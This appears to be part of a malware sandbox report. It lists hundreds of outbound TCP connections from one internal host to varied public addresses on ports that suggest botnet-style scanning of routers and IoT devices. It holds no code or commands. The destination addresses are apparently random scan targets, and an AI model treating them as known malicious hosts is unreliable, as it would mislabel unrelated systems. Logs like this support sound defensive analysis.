Source: global traffic	TCP traffic: 192.168.2.20:58328 -> 60.222.236.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:57698 -> 45.220.233.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:39368 -> 188.61.141.250:49152
Source: global traffic	TCP traffic: 192.168.2.20:53682 -> 189.51.61.124:5555
Source: global traffic	TCP traffic: 192.168.2.20:53168 -> 82.32.209.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:53620 -> 54.139.218.167:5555
Source: global traffic	TCP traffic: 192.168.2.20:39316 -> 54.194.243.156:49152
Source: global traffic	TCP traffic: 192.168.2.20:33798 -> 161.170.180.99:81
Source: global traffic	TCP traffic: 192.168.2.20:54032 -> 219.190.141.219:8080
Source: global traffic	TCP traffic: 192.168.2.20:45228 -> 102.247.160.88:52869
Source: global traffic	TCP traffic: 192.168.2.20:57020 -> 178.236.3.160:8443
Source: global traffic	TCP traffic: 192.168.2.20:44548 -> 42.112.107.113:81
Source: global traffic	TCP traffic: 192.168.2.20:52310 -> 214.58.190.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:59932 -> 15.81.245.80:37215
Source: global traffic	TCP traffic: 192.168.2.20:60906 -> 3.31.11.51:52869
Source: global traffic	TCP traffic: 192.168.2.20:38286 -> 8.231.233.201:8080
Source: global traffic	TCP traffic: 192.168.2.20:50754 -> 161.95.111.90:8080
Source: global traffic	TCP traffic: 192.168.2.20:49450 -> 115.251.170.50:8443
Source: global traffic	TCP traffic: 192.168.2.20:40136 -> 21.210.48.60:5555
Source: global traffic	TCP traffic: 192.168.2.20:37408 -> 19.228.27.33:8080
Source: global traffic	TCP traffic: 192.168.2.20:59548 -> 198.75.210.198:7574
Source: global traffic	TCP traffic: 192.168.2.20:57734 -> 157.111.93.206:5555
Source: global traffic	TCP traffic: 192.168.2.20:53854 -> 8.191.54.125:37215
Source: global traffic	TCP traffic: 192.168.2.20:36222 -> 83.169.154.146:8443
Source: global traffic	TCP traffic: 192.168.2.20:40470 -> 28.20.175.209:81
Source: global traffic	TCP traffic: 192.168.2.20:54056 -> 11.0.46.244:49152
Source: global traffic	TCP traffic: 192.168.2.20:50054 -> 46.138.124.14:49152
Source: global traffic	TCP traffic: 192.168.2.20:55876 -> 48.57.169.235:37215
Source: global traffic	TCP traffic: 192.168.2.20:38722 -> 188.76.169.197:8080
Source: global traffic	TCP traffic: 192.168.2.20:51776 -> 54.214.12.70:5555
Source: global traffic	TCP traffic: 192.168.2.20:40314 -> 222.36.210.127:37215
Source: global traffic	TCP traffic: 192.168.2.20:59114 -> 202.164.221.195:49152
Source: global traffic	TCP traffic: 192.168.2.20:50036 -> 119.17.3.130:49152
Source: global traffic	TCP traffic: 192.168.2.20:57186 -> 215.110.247.154:52869
Source: global traffic	TCP traffic: 192.168.2.20:57952 -> 118.183.105.53:8443
Source: global traffic	TCP traffic: 192.168.2.20:33232 -> 27.46.25.163:52869
Source: global traffic	TCP traffic: 192.168.2.20:36872 -> 62.237.39.27:49152
Source: global traffic	TCP traffic: 192.168.2.20:60776 -> 174.11.178.210:5555
Source: global traffic	TCP traffic: 192.168.2.20:38918 -> 164.156.119.109:8080
Source: global traffic	TCP traffic: 192.168.2.20:56754 -> 185.95.199.80:8080
Source: global traffic	TCP traffic: 192.168.2.20:42484 -> 88.64.5.249:8080
Source: global traffic	TCP traffic: 192.168.2.20:59846 -> 202.171.192.205:7574
Source: global traffic	TCP traffic: 192.168.2.20:58760 -> 194.243.234.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:46986 -> 76.5.175.91:7574
Source: global traffic	TCP traffic: 192.168.2.20:52502 -> 160.189.168.11:37215
Source: global traffic	TCP traffic: 192.168.2.20:60458 -> 184.133.154.232:8080
Source: global traffic	TCP traffic: 192.168.2.20:43954 -> 46.110.225.126:8080
Source: global traffic	TCP traffic: 192.168.2.20:34068 -> 122.76.30.28:8080
Source: global traffic	TCP traffic: 192.168.2.20:50900 -> 146.5.176.64:49152
Source: global traffic	TCP traffic: 192.168.2.20:47640 -> 137.225.108.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:37910 -> 162.72.144.200:8443
Source: global traffic	TCP traffic: 192.168.2.20:44098 -> 14.137.108.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:55294 -> 103.208.59.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:49854 -> 175.79.49.111:52869
Source: global traffic	TCP traffic: 192.168.2.20:51114 -> 184.195.78.194:5555
Source: global traffic	TCP traffic: 192.168.2.20:50090 -> 195.254.187.23:8080
Source: global traffic	TCP traffic: 192.168.2.20:39760 -> 62.217.214.44:8080
Source: global traffic	TCP traffic: 192.168.2.20:51876 -> 198.26.185.1:49152
Source: global traffic	TCP traffic: 192.168.2.20:44500 -> 90.59.150.212:5555
Source: global traffic	TCP traffic: 192.168.2.20:40216 -> 57.50.30.157:49152
Source: global traffic	TCP traffic: 192.168.2.20:56508 -> 196.8.192.224:8080
Source: global traffic	TCP traffic: 192.168.2.20:43366 -> 85.122.252.148:8443
Source: global traffic	TCP traffic: 192.168.2.20:43488 -> 137.142.227.113:37215
Source: global traffic	TCP traffic: 192.168.2.20:33858 -> 220.186.175.16:5555
Source: global traffic	TCP traffic: 192.168.2.20:48744 -> 11.151.211.21:8443
Source: global traffic	TCP traffic: 192.168.2.20:35056 -> 99.22.46.253:81
Source: global traffic	TCP traffic: 192.168.2.20:51026 -> 194.63.219.69:81
Source: global traffic	TCP traffic: 192.168.2.20:41328 -> 22.104.172.87:8080
Source: global traffic	TCP traffic: 192.168.2.20:37098 -> 125.45.4.232:7574
Source: global traffic	TCP traffic: 192.168.2.20:57546 -> 84.183.159.213:37215
Source: global traffic	TCP traffic: 192.168.2.20:45660 -> 77.125.39.19:7574
Source: global traffic	TCP traffic: 192.168.2.20:39476 -> 81.227.254.8:8080
Source: global traffic	TCP traffic: 192.168.2.20:58714 -> 186.124.130.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:44310 -> 135.13.251.193:8443
Source: global traffic	TCP traffic: 192.168.2.20:58216 -> 49.240.54.114:49152
Source: global traffic	TCP traffic: 192.168.2.20:55714 -> 97.149.39.21:52869
Source: global traffic	TCP traffic: 192.168.2.20:44856 -> 145.201.199.95:8080
Source: global traffic	TCP traffic: 192.168.2.20:54518 -> 145.243.250.38:8080
Source: global traffic	TCP traffic: 192.168.2.20:46072 -> 53.140.123.217:8443
Source: global traffic	TCP traffic: 192.168.2.20:53028 -> 46.29.166.221:8080
Source: global traffic	TCP traffic: 192.168.2.20:44150 -> 96.117.90.192:8080
Source: global traffic	TCP traffic: 192.168.2.20:47674 -> 44.173.210.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:44056 -> 131.108.171.195:5555
Source: global traffic	TCP traffic: 192.168.2.20:47758 -> 7.133.161.69:37215
Source: global traffic	TCP traffic: 192.168.2.20:60334 -> 209.224.95.250:8443
Source: global traffic	TCP traffic: 192.168.2.20:40270 -> 63.27.192.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:46282 -> 112.36.7.254:37215
Source: global traffic	TCP traffic: 192.168.2.20:36712 -> 35.42.181.95:8443
Source: global traffic	TCP traffic: 192.168.2.20:37028 -> 85.34.73.210:5555
Source: global traffic	TCP traffic: 192.168.2.20:36212 -> 205.214.189.164:8443
Source: global traffic	TCP traffic: 192.168.2.20:57058 -> 69.153.253.195:49152
Source: global traffic	TCP traffic: 192.168.2.20:46398 -> 54.39.218.76:37215
Source: global traffic	TCP traffic: 192.168.2.20:42590 -> 199.22.238.78:8080
Source: global traffic	TCP traffic: 192.168.2.20:50434 -> 183.247.34.112:81
Source: global traffic	TCP traffic: 192.168.2.20:33194 -> 26.17.1.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:38044 -> 91.193.93.252:52869
Source: global traffic	TCP traffic: 192.168.2.20:59878 -> 47.167.153.49:52869
Source: global traffic	TCP traffic: 192.168.2.20:53416 -> 37.157.134.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:59302 -> 65.218.226.124:7574
Source: global traffic	TCP traffic: 192.168.2.20:39006 -> 133.225.142.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:45766 -> 33.33.197.233:52869
Source: global traffic	TCP traffic: 192.168.2.20:56848 -> 57.2.217.0:5555
Source: global traffic	TCP traffic: 192.168.2.20:36556 -> 114.208.194.52:8080
Source: global traffic	TCP traffic: 192.168.2.20:47474 -> 168.155.124.28:81
Source: global traffic	TCP traffic: 192.168.2.20:44738 -> 200.70.157.247:8080
Source: global traffic	TCP traffic: 192.168.2.20:52742 -> 18.22.126.190:8443
Source: global traffic	TCP traffic: 192.168.2.20:33038 -> 162.168.17.49:7574
Source: global traffic	TCP traffic: 192.168.2.20:36808 -> 116.26.35.18:52869
Source: global traffic	TCP traffic: 192.168.2.20:41998 -> 19.224.127.237:8080
Source: global traffic	TCP traffic: 192.168.2.20:33120 -> 33.247.46.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:57164 -> 19.94.113.230:8080
Source: global traffic	TCP traffic: 192.168.2.20:58236 -> 66.156.43.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:38722 -> 5.144.31.210:37215
Source: global traffic	TCP traffic: 192.168.2.20:33704 -> 65.59.81.254:8443
Source: global traffic	TCP traffic: 192.168.2.20:45044 -> 111.147.154.242:8080
Source: global traffic	TCP traffic: 192.168.2.20:58678 -> 42.247.127.116:8443
Source: global traffic	TCP traffic: 192.168.2.20:35152 -> 13.143.231.12:8080
Source: global traffic	TCP traffic: 192.168.2.20:57278 -> 18.196.100.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:54076 -> 144.171.238.211:81
Source: global traffic	TCP traffic: 192.168.2.20:51050 -> 18.149.58.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:38730 -> 122.139.195.181:8080
Source: global traffic	TCP traffic: 192.168.2.20:54690 -> 184.225.49.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:55844 -> 19.35.22.33:52869
Source: global traffic	TCP traffic: 192.168.2.20:40502 -> 210.120.216.194:8080
Source: global traffic	TCP traffic: 192.168.2.20:39164 -> 31.69.24.163:81
Source: global traffic	TCP traffic: 192.168.2.20:44118 -> 189.16.44.51:37215
Source: global traffic	TCP traffic: 192.168.2.20:33812 -> 35.197.143.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:48974 -> 69.107.161.237:37215
Source: global traffic	TCP traffic: 192.168.2.20:59348 -> 67.97.143.243:8443
Source: global traffic	TCP traffic: 192.168.2.20:59968 -> 59.141.161.142:8080
Source: global traffic	TCP traffic: 192.168.2.20:36518 -> 160.161.138.92:8443
Source: global traffic	TCP traffic: 192.168.2.20:43408 -> 185.169.150.24:8080
Source: global traffic	TCP traffic: 192.168.2.20:59912 -> 195.8.49.55:81
Source: global traffic	TCP traffic: 192.168.2.20:48298 -> 186.144.158.222:7574
Source: global traffic	TCP traffic: 192.168.2.20:59652 -> 215.122.80.92:49152
Source: global traffic	TCP traffic: 192.168.2.20:33622 -> 183.30.162.72:52869
Source: global traffic	TCP traffic: 192.168.2.20:42074 -> 208.77.218.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:58454 -> 19.110.225.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:35942 -> 91.192.83.22:37215
Source: global traffic	TCP traffic: 192.168.2.20:48822 -> 146.31.191.38:49152
Source: global traffic	TCP traffic: 192.168.2.20:58146 -> 81.192.248.54:8080
Source: global traffic	TCP traffic: 192.168.2.20:42694 -> 220.112.131.158:49152
Source: global traffic	TCP traffic: 192.168.2.20:54502 -> 12.121.21.175:49152
Source: global traffic	TCP traffic: 192.168.2.20:48304 -> 93.252.183.105:5555
Source: global traffic	TCP traffic: 192.168.2.20:40482 -> 169.153.122.4:8080
Source: global traffic	TCP traffic: 192.168.2.20:37676 -> 45.175.32.225:7574
Source: global traffic	TCP traffic: 192.168.2.20:55092 -> 175.116.229.144:8443
Source: global traffic	TCP traffic: 192.168.2.20:40358 -> 1.229.142.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:55158 -> 161.55.227.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:40944 -> 3.54.72.115:8443
Source: global traffic	TCP traffic: 192.168.2.20:60000 -> 211.130.169.58:52869
Source: global traffic	TCP traffic: 192.168.2.20:58138 -> 71.189.125.136:8080
Source: global traffic	TCP traffic: 192.168.2.20:52926 -> 35.134.65.144:5555
Source: global traffic	TCP traffic: 192.168.2.20:53140 -> 81.185.164.190:49152
Source: global traffic	TCP traffic: 192.168.2.20:58740 -> 68.38.131.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:48186 -> 158.215.177.9:7574
Source: global traffic	TCP traffic: 192.168.2.20:33492 -> 21.71.60.36:52869
Source: global traffic	TCP traffic: 192.168.2.20:41634 -> 15.139.248.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:59812 -> 52.173.108.207:8080
Source: global traffic	TCP traffic: 192.168.2.20:59544 -> 14.27.221.29:8080
Source: global traffic	TCP traffic: 192.168.2.20:50294 -> 200.160.26.61:37215
Source: global traffic	TCP traffic: 192.168.2.20:58298 -> 117.0.115.227:52869
Source: global traffic	TCP traffic: 192.168.2.20:55566 -> 72.204.193.69:37215
Source: global traffic	TCP traffic: 192.168.2.20:60458 -> 88.55.10.218:8080
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 173.95.216.55:5555
Source: global traffic	TCP traffic: 192.168.2.20:39734 -> 131.6.224.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:52616 -> 108.58.115.194:49152
Source: global traffic	TCP traffic: 192.168.2.20:58152 -> 217.28.121.124:8080
Source: global traffic	TCP traffic: 192.168.2.20:41218 -> 176.24.193.254:7574
Source: global traffic	TCP traffic: 192.168.2.20:47630 -> 107.15.195.209:8443
Source: global traffic	TCP traffic: 192.168.2.20:37986 -> 132.224.19.35:8080
Source: global traffic	TCP traffic: 192.168.2.20:39588 -> 85.4.13.35:52869
Source: global traffic	TCP traffic: 192.168.2.20:44530 -> 114.116.30.250:7574
Source: global traffic	TCP traffic: 192.168.2.20:44300 -> 13.23.175.71:81
Source: global traffic	TCP traffic: 192.168.2.20:40322 -> 209.49.249.153:8443
Source: global traffic	TCP traffic: 192.168.2.20:42126 -> 89.192.178.91:37215
Source: global traffic	TCP traffic: 192.168.2.20:44606 -> 61.175.55.132:8443
Source: global traffic	TCP traffic: 192.168.2.20:54536 -> 167.174.7.212:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 154.18.253.69:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 42.157.134.10:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 108.74.215.207:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 216.157.116.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.147.101.239:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 191.216.64.228:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.25.8.99:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 210.225.37.119:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 173.191.26.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 107.5.252.208:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 180.196.64.7:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 184.90.217.19:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 66.169.135.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.43.5.52:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 20.10.172.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 24.173.204.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 40.231.251.18:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 44.125.192.91:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 185.199.252.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 202.222.248.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 65.76.58.171:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.152.241.251:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 92.140.135.135:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 221.79.125.189:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.19.93.192:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 112.208.55.3:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 74.181.98.131:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 146.221.115.228:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 147.32.87.2:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 188.213.166.122:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 158.198.126.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 221.11.44.192:2323
Source: global traffic	TCP traffic: 192.168.2.20:45980 -> 206.215.160.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:60230 -> 194.134.230.15:8080
Source: global traffic	TCP traffic: 192.168.2.20:33288 -> 168.62.179.106:8080
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 186.129.59.209:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 183.39.114.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 69.160.36.31:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 41.208.87.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 19.1.83.59:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 189.83.101.94:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 89.211.68.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 40.110.214.92:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.48.184.226:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 112.253.107.53:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.145.180.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.11.34.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 70.130.42.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 4.110.27.220:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 160.227.213.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 187.190.81.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 107.61.226.20:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.252.174.236:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 12.233.123.43:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 153.192.241.136:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 147.166.248.166:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 223.87.220.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 13.152.241.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.61.31.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 63.253.84.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 86.185.251.149:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 8.92.251.48:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 211.32.153.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 203.0.21.109:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 72.221.8.246:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 202.213.206.179:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 35.117.35.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.194.99.188:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.103.236.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 212.219.62.189:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 206.123.155.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 76.92.182.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 36.33.205.198:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 38.157.124.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 58.155.188.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 113.44.78.247:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 97.68.83.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 121.99.87.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 87.22.241.41:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 178.95.227.170:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 118.211.78.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 151.87.97.55:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 209.66.123.242:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 27.255.154.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 176.242.102.183:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 146.35.33.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 65.77.77.241:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 219.122.59.104:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 101.118.160.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 81.54.132.55:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 175.223.210.199:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 191.15.46.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 168.145.68.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 38.29.8.84:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 84.255.39.9:1023
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 175.61.243.196:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 100.134.61.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 217.93.0.20:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 79.65.71.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 20.167.158.223:2323
Source: global traffic	TCP traffic: 192.168.2.20:15042 -> 74.118.105.34:2323
Source: global traffic	TCP traffic: 192.168.2.20:42434 -> 187.254.232.94:8443
Source: global traffic	TCP traffic: 192.168.2.20:43764 -> 207.11.230.122:8080
Source: global traffic	TCP traffic: 192.168.2.20:48034 -> 19.134.158.13:8080
Source: global traffic	TCP traffic: 192.168.2.20:48348 -> 44.61.11.55:8080
Source: global traffic	TCP traffic: 192.168.2.20:48496 -> 178.113.43.27:7574
Source: global traffic	TCP traffic: 192.168.2.20:50444 -> 123.219.44.5:81
Source: global traffic	TCP traffic: 192.168.2.20:48516 -> 89.233.76.116:8080
Source: global traffic	TCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
Source: global traffic	TCP traffic: 192.168.2.20:50534 -> 211.137.192.96:8080
Source: global traffic	TCP traffic: 192.168.2.20:59440 -> 88.201.76.34:7574
Source: global traffic	TCP traffic: 192.168.2.20:53588 -> 79.165.147.138:5555
Source: global traffic	TCP traffic: 192.168.2.20:35806 -> 37.229.199.107:8443
Source: global traffic	TCP traffic: 192.168.2.20:60106 -> 190.174.62.228:7574
Source: global traffic	TCP traffic: 192.168.2.20:54834 -> 40.19.224.212:8080
Source: global traffic	TCP traffic: 192.168.2.20:59008 -> 196.13.229.215:52869
Source: global traffic	TCP traffic: 192.168.2.20:36360 -> 101.193.149.11:81
Source: global traffic	TCP traffic: 192.168.2.20:50182 -> 148.157.191.210:49152
Source: global traffic	TCP traffic: 192.168.2.20:36990 -> 146.151.247.1:52869
Source: global traffic	TCP traffic: 192.168.2.20:37184 -> 173.191.56.106:8080
Source: global traffic	TCP traffic: 192.168.2.20:46266 -> 214.0.104.172:52869
Source: global traffic	TCP traffic: 192.168.2.20:60148 -> 206.34.195.249:81
Source: global traffic	TCP traffic: 192.168.2.20:41632 -> 134.240.237.208:8443
Source: global traffic	TCP traffic: 192.168.2.20:50748 -> 221.163.252.68:7574
Source: global traffic	TCP traffic: 192.168.2.20:56358 -> 13.176.53.86:52869
Source: global traffic	TCP traffic: 192.168.2.20:56030 -> 152.180.2.14:8080
Source: global traffic	TCP traffic: 192.168.2.20:34140 -> 3.184.34.149:8443
Source: global traffic	TCP traffic: 192.168.2.20:57666 -> 171.141.124.240:8443
Source: global traffic	TCP traffic: 192.168.2.20:42454 -> 89.125.164.152:52869
Source: global traffic	TCP traffic: 192.168.2.20:49348 -> 193.121.216.28:8080
Source: global traffic	TCP traffic: 192.168.2.20:49216 -> 164.154.93.195:8080
Source: global traffic	TCP traffic: 192.168.2.20:42866 -> 222.34.74.234:8080
Source: global traffic	TCP traffic: 192.168.2.20:36006 -> 18.247.152.131:5555
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
Source: global traffic	TCP traffic: 192.168.2.20:34394 -> 5.230.135.152:37215
Source: global traffic	TCP traffic: 192.168.2.20:39916 -> 118.110.234.130:7574
Source: global traffic	TCP traffic: 192.168.2.20:33904 -> 122.25.166.83:52869
Source: global traffic	TCP traffic: 192.168.2.20:45598 -> 45.204.245.109:49152
Source: global traffic	TCP traffic: 192.168.2.20:56044 -> 147.133.242.76:8080
Source: global traffic	TCP traffic: 192.168.2.20:59490 -> 19.118.124.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:42346 -> 132.139.233.175:37215
Source: global traffic	TCP traffic: 192.168.2.20:59948 -> 117.21.87.201:7574
Source: global traffic	TCP traffic: 192.168.2.20:58880 -> 6.243.236.18:8080
Source: global traffic	TCP traffic: 192.168.2.20:45762 -> 3.67.142.9:5555
Source: global traffic	TCP traffic: 192.168.2.20:41018 -> 70.33.99.104:5555
Source: global traffic	TCP traffic: 192.168.2.20:42532 -> 152.100.167.36:8443
Source: global traffic	TCP traffic: 192.168.2.20:32890 -> 58.12.204.60:8080
Source: global traffic	TCP traffic: 192.168.2.20:32780 -> 4.2.179.224:81
Source: global traffic	TCP traffic: 192.168.2.20:54140 -> 196.106.27.28:81
Source: global traffic	TCP traffic: 192.168.2.20:52696 -> 123.224.23.253:8080
Source: global traffic	TCP traffic: 192.168.2.20:36056 -> 22.193.177.229:52869
Source: global traffic	TCP traffic: 192.168.2.20:52546 -> 93.204.44.191:8443
Source: global traffic	TCP traffic: 192.168.2.20:51248 -> 35.83.92.160:5555
Source: global traffic	TCP traffic: 192.168.2.20:39020 -> 204.121.33.136:49152
Source: global traffic	TCP traffic: 192.168.2.20:58310 -> 175.140.231.185:8080
Source: global traffic	TCP traffic: 192.168.2.20:39544 -> 133.59.219.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:52212 -> 43.25.44.12:7574
Source: global traffic	TCP traffic: 192.168.2.20:41908 -> 209.121.184.1:49152
Source: global traffic	TCP traffic: 192.168.2.20:53734 -> 219.159.206.231:49152
Source: global traffic	TCP traffic: 192.168.2.20:47382 -> 143.190.192.234:81
Source: global traffic	TCP traffic: 192.168.2.20:43158 -> 160.205.73.207:5555
Source: global traffic	TCP traffic: 192.168.2.20:32832 -> 117.175.62.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:43804 -> 180.27.20.9:8443
Source: global traffic	TCP traffic: 192.168.2.20:48400 -> 79.46.53.90:5555
Source: global traffic	TCP traffic: 192.168.2.20:51920 -> 170.153.165.207:37215
Source: global traffic	TCP traffic: 192.168.2.20:52388 -> 25.120.108.166:37215
Source: global traffic	TCP traffic: 192.168.2.20:38936 -> 88.143.113.184:37215
Source: global traffic	TCP traffic: 192.168.2.20:43268 -> 15.35.59.131:8080
Source: global traffic	TCP traffic: 192.168.2.20:44336 -> 44.140.107.144:37215
Source: global traffic	TCP traffic: 192.168.2.20:40376 -> 106.57.104.27:8080
Source: global traffic	TCP traffic: 192.168.2.20:37816 -> 119.44.94.32:8080
Source: global traffic	TCP traffic: 192.168.2.20:58936 -> 222.91.171.102:5555
Source: global traffic	TCP traffic: 192.168.2.20:50526 -> 152.99.103.175:81
Source: global traffic	TCP traffic: 192.168.2.20:35450 -> 168.17.134.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:51626 -> 197.177.18.211:8080
Source: global traffic	TCP traffic: 192.168.2.20:56636 -> 196.83.210.30:8443
Source: global traffic	TCP traffic: 192.168.2.20:38300 -> 185.155.197.240:81
Source: global traffic	TCP traffic: 192.168.2.20:33164 -> 121.26.58.85:49152
Source: global traffic	TCP traffic: 192.168.2.20:56170 -> 164.150.9.40:7574
Source: global traffic	TCP traffic: 192.168.2.20:39376 -> 51.12.46.124:5555
Source: global traffic	TCP traffic: 192.168.2.20:48264 -> 121.149.137.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:42412 -> 2.93.191.137:8080
Source: global traffic	TCP traffic: 192.168.2.20:41438 -> 189.120.2.56:81
Source: global traffic	TCP traffic: 192.168.2.20:50726 -> 177.173.185.50:5555
Source: global traffic	TCP traffic: 192.168.2.20:48968 -> 43.219.247.168:7574
Source: global traffic	TCP traffic: 192.168.2.20:54234 -> 91.65.28.188:8080
Source: global traffic	TCP traffic: 192.168.2.20:51310 -> 177.152.69.68:81
